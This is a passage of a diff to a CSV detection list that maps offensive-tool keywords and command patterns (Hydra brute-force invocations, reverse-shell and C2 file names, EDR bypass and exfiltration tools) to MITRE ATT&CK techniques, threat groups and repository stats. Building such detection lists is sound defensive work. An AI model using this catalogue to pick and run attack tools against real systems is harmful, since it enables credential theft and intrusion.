Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*https://wfuzz.readthedocs.io*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*https://www.myget.org/F/fireeye/api/v2*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" "*https_revshell.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*httpsmuggler.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" -"*https-portal*","offensive_tool_keyword","https-portal","HTTPS-PORTAL is a fully automated HTTPS server powered by Nginx. Lets Encrypt and Docker. By using it. you can run any existing web application over HTTPS. with only one extra line of configuration. The SSL certificates are obtained. and renewed from Lets Encrypt automatically.","T1042 - T1571 - T1021 - T1135","TA0002 - TA0003 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/SteveLTN/https-portal","1","0","N/A","N/A","10","4209","288","2023-01-29T14:55:41Z","2015-12-14T20:09:04Z" -"*'http-stager'*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*https-portal*","offensive_tool_keyword","https-portal","HTTPS-PORTAL is a fully automated HTTPS server powered by Nginx. Lets Encrypt and Docker. By using it. you can run any existing web application over HTTPS. with only one extra line of configuration. The SSL certificates are obtained. and renewed from Lets Encrypt automatically.","T1042 - T1571 - T1021 - T1135","TA0002 - TA0003 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/SteveLTN/https-portal","1","0","N/A","N/A","10","4210","288","2023-01-29T14:55:41Z","2015-12-14T20:09:04Z" +"*'http-stager'*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*huan.exe *.exe","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*Huan.sln*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*Huan.vcxproj*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*HuanLoader.vcxproj*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*hub.docker.com/u/kalilinux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*HunnicCyber/SharpDomainSpray*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" -"*HVNC Server.exe*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HVNC\ Server*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra * ftp://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra * http-post-form *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra * mysql://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra * ssh://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra * telnet://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra smtp-enum*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra.c*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra:x:10001:*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*HYDRA_PROXY_HTTP*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra-cobaltstrike*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*HVNC Server.exe*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HVNC\ Server*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * ftp://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * http-post-form *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * mysql://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * ssh://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * telnet://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra smtp-enum*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra.c*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra:x:10001:*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*HYDRA_PROXY_HTTP*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra-cobaltstrike*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "*Hyperion PE-Crypter*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*hyperion.exe *","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*hyperion_2.0.orig.tar.gz*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" @@ -11448,10 +11601,10 @@ "*hypobrychium.exe*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" "*hypobrychium-main*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" "*i2pinstall*","offensive_tool_keyword","I2P","I2P - The Invisible Internet Project.","T1048.001 - T1568.003","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://geti2p.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*iam__enum_assume_role/default-word-list.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*iam__enum_assume_role/default-word-list.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" "*iammaguire/Gotato*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" -"*ibmiscanner2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ibmiscanner2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*IBurpExtender.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" "*IBurpExtenderCallbacks.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" "*icebreaker:P@ssword123456*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" @@ -11459,104 +11612,104 @@ "*icebreaker-scan.xml*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*IcebreakerSecurity/DelegationBOF*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*IcebreakerSecurity/DelegationBOF*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" -"*IcebreakerSecurity/PersistBOF*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*IcebreakerSecurity/PersistBOF*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*ice-wzl/wmiexec2*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*ICMP-ReceiveFile.py*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" -"*Icmp-Redirect.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Icmp-Redirect.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*ICMP-SendFile.py*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*icmpsh.exe*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 